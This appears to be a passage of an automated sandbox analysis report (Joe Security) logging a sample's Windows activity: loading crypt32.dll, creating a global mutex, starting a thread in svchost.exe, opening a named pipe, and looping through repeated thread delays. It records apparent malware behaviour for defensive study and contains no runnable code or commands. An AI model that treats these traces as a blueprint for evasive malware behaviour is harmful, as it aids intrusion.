Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: E20000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2324111863
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2324115300
Thread created PID: 2264 TID: 3372 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2324117211
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2324119162
Thread delayed Time: 0 TID: 13124 success or wait 2324970975
Thread delayed Time: 0 TID: 13124 success or wait 2324971764
Thread delayed Time: 0 TID: 13124 success or wait 2324972268
Thread delayed Time: 0 TID: 13124 success or wait 2326092745
Thread delayed Time: 0 TID: 13124 success or wait 2326095166
Thread delayed Time: 0 TID: 13124 success or wait 2326096809
Thread delayed Time: 0 TID: 13124 success or wait 2327208480
Thread delayed Time: 0 TID: 13124 success or wait 2327208999
Thread delayed Time: 0 TID: 13124 success or wait 2327209490
Thread delayed Time: 0 TID: 13124 success or wait 2328326850
Thread delayed Time: 0 TID: 13124 success or wait 2328327028
Thread delayed Time: 0 TID: 13124 success or wait 2328327201
Thread delayed Time: 0 TID: 13124 success or wait 2329445372
Thread delayed Time: 0 TID: 13124 success or wait 2329445550
Thread delayed Time: 0 TID: 13124 success or wait 2329445724
Thread delayed Time: 0 TID: 13124 success or wait 2330564313
Thread delayed Time: 0 TID: 13124 success or wait 2330564826
Thread delayed Time: 0 TID: 13124 success or wait 2330565319
Thread delayed Time: 0 TID: 13124 success or wait 2331683008
Thread delayed Time: 0 TID: 13124 success or wait 2331683528
Thread delayed Time: 0 TID: 13124 success or wait 2331684029
Thread delayed Time: 0 TID: 13124 success or wait 2332801536
Thread delayed Time: 0 TID: 13124 success or wait 2332802090
Thread delayed Time: 0 TID: 13124 success or wait 2332802598
Thread delayed Time: 0 TID: 13124 success or wait 2333920127
Thread delayed Time: 0 TID: 13124 success or wait 2333920652
Thread delayed Time: 0 TID: 13124 success or wait 2333921165
Thread delayed Time: 0 TID: 13124 success or wait 2335041436
Thread delayed Time: 0 TID: 13124 success or wait 2335041950
Thread delayed Time: 0 TID: 13124 success or wait 2335042452
Thread delayed Time: 0 TID: 13124 success or wait 2336157353
Thread delayed Time: 0 TID: 13124 success or wait 2336157870
Thread delayed Time: 0 TID: 13124 success or wait 2336158406
Thread delayed Time: 0 TID: 13124 success or wait 2337275599
Thread delayed Time: 0 TID: 13124 success or wait 2337276113
Thread delayed Time: 0 TID: 13124 success or wait 2337276608
Thread delayed Time: 0 TID: 13124 success or wait 2338397600
Thread delayed Time: 0 TID: 13124 success or wait 2338398106
Thread delayed Time: 0 TID: 13124 success or wait 2338398605
Thread delayed Time: 0 TID: 13124 success or wait 2339513250
Thread delayed Time: 0 TID: 13124 success or wait 2339513794
Thread delayed Time: 0 TID: 13124 success or wait 2339514294
Thread delayed Time: 0 TID: 13124 success or wait 2340631525
Thread delayed Time: 0 TID: 13124 success or wait 2340631710
Thread delayed Time: 0 TID: 13124 success or wait 2340631885
Thread delayed Time: 0 TID: 13124 success or wait 2341750146
Thread delayed Time: 0 TID: 13124 success or wait 2341750329
Copyright 2011 Joe Security | All rights reserved | www.joesecurity.org | This page is optimized for firefox - 1024x786